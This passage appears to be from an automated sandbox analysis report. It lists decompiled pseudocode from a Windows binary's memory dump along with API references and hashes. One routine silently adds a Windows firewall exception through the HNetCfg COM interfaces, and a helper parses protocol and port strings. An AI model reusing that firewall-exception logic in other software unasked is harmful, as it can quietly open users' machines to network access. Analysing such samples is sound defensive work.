                                                                                                                                                      				intOrPtr* _t68;
                                                                                                                                                      				char _t83;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      
                                                                                                                                                      				_t82 = __edx;
                                                                                                                                                      				_t39 =  *0x99f008; // 0x315d8c09
                                                                                                                                                      				_v12 = _t39 ^ _t86;
                                                                                                                                                      				_t83 = 0;
                                                                                                                                                      				_v56 = _a4;
                                                                                                                                                      				__imp__CoInitialize(0);
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_t43 = E009980F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                      				_t85 = __imp__CLSIDFromProgID;
                                                                                                                                                      				_t44 =  *_t85(_t43,  &_v28);
                                                                                                                                                      				_t70 = _t44;
                                                                                                                                                      				if(_t44 == 0) {
                                                                                                                                                      					_t56 =  &_v28;
                                                                                                                                                      					__imp__CoCreateInstance(_t56, 0, 5, 0x99c17c,  &_v32);
                                                                                                                                                      					_t70 = _t56;
                                                                                                                                                      					if(_t56 >= 0) {
                                                                                                                                                      						_t57 = _v32;
                                                                                                                                                      						_t82 =  &_v44;
                                                                                                                                                      						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
                                                                                                                                                      						_t70 = _t58;
                                                                                                                                                      						if(_t58 >= 0) {
                                                                                                                                                      							_t59 = _v44;
                                                                                                                                                      							_t82 =  &_v40;
                                                                                                                                                      							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
                                                                                                                                                      							_t70 = _t60;
                                                                                                                                                      							if(_t60 >= 0) {
                                                                                                                                                      								_t63 =  *_t85(E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                      								_t70 = _t63;
                                                                                                                                                      								if(_t63 >= 0) {
                                                                                                                                                      									_t64 = _v40;
                                                                                                                                                      									_t82 =  &_v36;
                                                                                                                                                      									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
                                                                                                                                                      									_t70 = _t65;
                                                                                                                                                      									if(_t65 >= 0) {
                                                                                                                                                      										_v52 = 0;
                                                                                                                                                      										_t85 =  &_v48;
                                                                                                                                                      										_v48 = 0x100;
                                                                                                                                                      										if(E00991071(_v56,  &_v48,  &_v52) != 0) {
                                                                                                                                                      											_t68 = _v36;
                                                                                                                                                      											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
                                                                                                                                                      										}
                                                                                                                                                      										_t83 = 0;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t45 = _v36;
                                                                                                                                                      				if(_t45 != _t83) {
                                                                                                                                                      					 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                      				}
                                                                                                                                                      				_t46 = _v40;
                                                                                                                                                      				if(_t46 != _t83) {
                                                                                                                                                      					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                      				}
                                                                                                                                                      				_t47 = _v44;
                                                                                                                                                      				if(_t47 != _t83) {
                                                                                                                                                      					 *((intOrPtr*)( *_t47 + 8))(_t47);
                                                                                                                                                      				}
                                                                                                                                                      				_t48 = _v32;
                                                                                                                                                      				if(_t48 != _t83) {
                                                                                                                                                      					 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__CoUninitialize();
                                                                                                                                                      				return E00991C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
                                                                                                                                                      			}


































                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0099169F
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009916BA
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009916C6
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009916E2
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991721
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991727
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • CoUninitialize.OLE32 ref: 009917A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 1827900861-1951265404
                                                                                                                                                      • Opcode ID: dda3d07b3f5b474a96c4fb7f5ec72ff845160fa6cf747c01c2d9405dde306d36
                                                                                                                                                      • Instruction ID: 9f3420907fe998a109bb82cf2b9681e741b59f0de09a66414d68c619cfc26b4c
                                                                                                                                                      • Opcode Fuzzy Hash: dda3d07b3f5b474a96c4fb7f5ec72ff845160fa6cf747c01c2d9405dde306d36
                                                                                                                                                      • Instruction Fuzzy Hash: 8B41DAB5A0420AAFCF00DFE8C8889EEB7FDBF8D714B24445AE501E7251D7769941CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E009928F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				signed int _t15;
                                                                                                                                                      				LONG* _t21;
                                                                                                                                                      				long _t23;
                                                                                                                                                      				void* _t29;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      				LONG* _t33;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      
                                                                                                                                                      				_t35 = __eflags;
                                                                                                                                                      				_t29 = __edx;
                                                                                                                                                      				_t25 = __ebx;
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x99dcb8);
                                                                                                                                                      				E00993F70(__ebx, __edi, __esi);
                                                                                                                                                      				_t31 = E0099339D(__ebx, __edi, _t35);
                                                                                                                                                      				_t15 =  *0x99f534; // 0xfffffffe
                                                                                                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                      					E00993C3D(_t25, 0xd);
                                                                                                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                      					__eflags = _t33 -  *0x99f438; // 0x2c71678
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                      						if(_t33 != 0) {
                                                                                                                                                      							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                      							if(_t23 == 0) {
                                                                                                                                                      								__eflags = _t33 - 0x99f010;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									_push(_t33);
                                                                                                                                                      									E009954A0(_t25, _t29, _t31, _t33, __eflags);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t21 =  *0x99f438; // 0x2c71678
                                                                                                                                                      						 *(_t31 + 0x68) = _t21;
                                                                                                                                                      						_t33 =  *0x99f438; // 0x2c71678
                                                                                                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                      						InterlockedIncrement(_t33);
                                                                                                                                                      					}
                                                                                                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                      					E0099298F();
                                                                                                                                                      				} else {
                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                      					E00992033(_t29, _t31, 0x20);
                                                                                                                                                      				}
                                                                                                                                                      				return E00993FB5(_t33);
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00992900
                                                                                                                                                        • Part of subcall function 0099339D: __getptd_noexit.LIBCMT ref: 009933A0
                                                                                                                                                        • Part of subcall function 0099339D: __amsg_exit.LIBCMT ref: 009933AD
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00992920
                                                                                                                                                      • __lock.LIBCMT ref: 00992930
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0099294D
                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C71678), ref: 00992978
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                      • Opcode ID: 7abebab8415ba9f8737b91a4eed9f384dfafeebd2ccccc87f615753fc29a7f23
                                                                                                                                                      • Instruction ID: 8aa255679fe6933ff17e12cec66678ed5366b98b63ec99911e29eb2b30a2eafa
                                                                                                                                                      • Opcode Fuzzy Hash: 7abebab8415ba9f8737b91a4eed9f384dfafeebd2ccccc87f615753fc29a7f23
                                                                                                                                                      • Instruction Fuzzy Hash: 4C01D632D01711FBDF21AF5CAA4A75EB3A8BF44750F044015E444B7190C7786E41DBE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                      			E009954A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				intOrPtr* _t10;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x99de48);
                                                                                                                                                      				_t8 = E00993F70(__ebx, __edi, __esi);
                                                                                                                                                      				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                      					L9:
                                                                                                                                                      					return E00993FB5(_t8);
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x9a0a98 != 3) {
                                                                                                                                                      					_push(_t24);
                                                                                                                                                      					L7:
                                                                                                                                                      					_t8 = HeapFree( *0x9a093c, 0, ??);
                                                                                                                                                      					_t32 = _t8;
                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                      						_t10 = E009938CA(_t32);
                                                                                                                                                      						 *_t10 = E00993888(GetLastError());
                                                                                                                                                      					}
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				E00993C3D(__ebx, 4);
                                                                                                                                                      				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                                                                                      				_t13 = E00996520(_t24);
                                                                                                                                                      				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                                                                                                                      				if(_t13 != 0) {
                                                                                                                                                      					_push(_t24);
                                                                                                                                                      					_push(_t13);
                                                                                                                                                      					E00996550();
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t26 - 4) = 0xfffffffe;
                                                                                                                                                      				_t8 = E009954F6();
                                                                                                                                                      				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                                                                                                                      					goto L9;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • __lock.LIBCMT ref: 009954BE
                                                                                                                                                        • Part of subcall function 00993C3D: __mtinitlocknum.LIBCMT ref: 00993C53
                                                                                                                                                        • Part of subcall function 00993C3D: __amsg_exit.LIBCMT ref: 00993C5F
                                                                                                                                                        • Part of subcall function 00993C3D: EnterCriticalSection.KERNEL32(?,?,?,0099754D,00000004,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001), ref: 00993C67
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 009954C9
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 009954D8
                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,0099DE48,0000000C,00993C1E,00000000,0099DD68,0000000C,00993C58,00000000,?,?,0099754D,00000004,0099DEC8,0000000C), ref: 00995508
                                                                                                                                                      • GetLastError.KERNEL32(?,0099754D,00000004,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001,00000214), ref: 00995519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                      • Opcode ID: e5ef359be7e3bb65aa34d71565c538842a999aeb7175958fe3fa71894ba57c1a
                                                                                                                                                      • Instruction ID: f34d610052be9fbe56e4733970b77a0fe6e00926d5f7b1826317c4352922f1f0
                                                                                                                                                      • Opcode Fuzzy Hash: e5ef359be7e3bb65aa34d71565c538842a999aeb7175958fe3fa71894ba57c1a
                                                                                                                                                      • Instruction Fuzzy Hash: 1301D671D05701ABEF216FBC9C0A75F3BA89F81361F228109F404A6091DB388A40DB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00991071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      
                                                                                                                                                      				_t25 = __edi;
                                                                                                                                                      				if(E00991C70(__edi, "udp") == 0) {
                                                                                                                                                      					if(E00991C70(__edi, "tcp") == 0) {
                                                                                                                                                      						if(E00991C70(__edi, "any") == 0) {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *__esi = 0x100;
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						 *__esi = 6;
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					 *__esi = 0x11;
                                                                                                                                                      					L6:
                                                                                                                                                      					if(E00991C70(_t25, ":") == 0) {
                                                                                                                                                      						L9:
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                                                                                      						_t11 = E00991FD7(_t9 + 1,  &_v8, 0xa);
                                                                                                                                                      						if(_t11 == 0) {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *_a4 = _t11;
                                                                                                                                                      							return 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcstoui64
                                                                                                                                                      • String ID: any$tcp$udp
                                                                                                                                                      • API String ID: 3882282163-1470427579
                                                                                                                                                      • Opcode ID: 9b03a2357e7e9937a54369cfe4488a7f4bc908751a7e0d0fb752363e62e95f97
                                                                                                                                                      • Instruction ID: 08f5e881b10edd15e95fc7246c5bdd35b35c418c34d5133154cfeb1081bd1fe0
                                                                                                                                                      • Opcode Fuzzy Hash: 9b03a2357e7e9937a54369cfe4488a7f4bc908751a7e0d0fb752363e62e95f97
                                                                                                                                                      • Instruction Fuzzy Hash: CC0162726493476AEF14AA2CDD43B3626DCAB82768F24011DB881D51C1FFF7D8D09629
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E00999110() {
                                                                                                                                                      				signed long long _v12;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed long long _v28;
                                                                                                                                                      				signed char _t8;
                                                                                                                                                      
                                                                                                                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                      					L6:
                                                                                                                                                      					_v20 =  *0x99d320;
                                                                                                                                                      					_v28 =  *0x99d318;
                                                                                                                                                      					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                      					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                      					asm("fld1");
                                                                                                                                                      					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                      					asm("fnstsw ax");
                                                                                                                                                      					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					} else {
                                                                                                                                                      						_push(0);
                                                                                                                                                      						return __eax;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,009984A4), ref: 00999115
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00999125
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                      • Opcode ID: 538c7d919474c653f4d74bef0b58dcd1a56dd9f1ec59def20ffeb969bd4c9575
                                                                                                                                                      • Instruction ID: 30e8250c99387d3e8a0ee217a739502a82f25a5f01f4ee0a17fba331a0aa2180
                                                                                                                                                      • Opcode Fuzzy Hash: 538c7d919474c653f4d74bef0b58dcd1a56dd9f1ec59def20ffeb969bd4c9575
                                                                                                                                                      • Instruction Fuzzy Hash: EEF0B430A05A0AE2DF101BADAC4F26FBB78FBC574AF820594D191B00C4DF3080B4D356
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00998FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      
                                                                                                                                                      				_t25 = _a16;
                                                                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                      					_t26 = E009988ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t34 = _t25 - 0x66;
                                                                                                                                                      					if(_t25 != 0x66) {
                                                                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                                                                      						if(_t25 == 0x61) {
                                                                                                                                                      							L7:
                                                                                                                                                      							_t26 = E009989DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                      						} else {
                                                                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								goto L7;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t26 = E00998F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L9:
                                                                                                                                                      						return _t26;
                                                                                                                                                      					} else {
                                                                                                                                                      						return E00998E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                      • Instruction ID: c5d8629bf407b3f59b1ff6889a5050185a75a5ad38896dfe8350426438e6b053
                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                      • Instruction Fuzzy Hash: A2114B3200014ABBCF226E98CC02DEE3F6BBB59354B588519FA2859031D736C9B1AB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E00993060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				signed int _t13;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                      				void* _t29;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __eflags;
                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                      				_t22 = __ebx;
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x99dcf8);
                                                                                                                                                      				E00993F70(__ebx, __edi, __esi);
                                                                                                                                                      				_t28 = E0099339D(__ebx, __edi, _t30);
                                                                                                                                                      				_t13 =  *0x99f534; // 0xfffffffe
                                                                                                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                      					L6:
                                                                                                                                                      					E00993C3D(_t22, 0xc);
                                                                                                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                      					_t26 =  *0x99f618; // 0x99f540
                                                                                                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E00993022(_t8, _t25, _t26);
                                                                                                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                      					E009930CA();
                                                                                                                                                      				} else {
                                                                                                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t28 =  *((intOrPtr*)(E0099339D(_t22, _t26, _t32) + 0x6c));
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                      					E00992033(_t25, _t26, 0x20);
                                                                                                                                                      				}
                                                                                                                                                      				return E00993FB5(_t28);
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 0099306C
                                                                                                                                                        • Part of subcall function 0099339D: __getptd_noexit.LIBCMT ref: 009933A0
                                                                                                                                                        • Part of subcall function 0099339D: __amsg_exit.LIBCMT ref: 009933AD
                                                                                                                                                      • __getptd.LIBCMT ref: 00993083
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00993091
                                                                                                                                                      • __lock.LIBCMT ref: 009930A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3521780317-0
                                                                                                                                                      • Opcode ID: 9c5321386e8d50d32adb3a0b0d4afb131b027cffd60ec235fcb6d5d28e4c45fb
                                                                                                                                                      • Instruction ID: df5e020ac21d3b755627e631d82dfed6f80d05f5c6d0a6cef0980f4d21fd62b2
                                                                                                                                                      • Opcode Fuzzy Hash: 9c5321386e8d50d32adb3a0b0d4afb131b027cffd60ec235fcb6d5d28e4c45fb
                                                                                                                                                      • Instruction Fuzzy Hash: 92F03032941704DADF20BF7C950B75DB3A4AF80712F10C519E4A4A72D2CB745B41DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%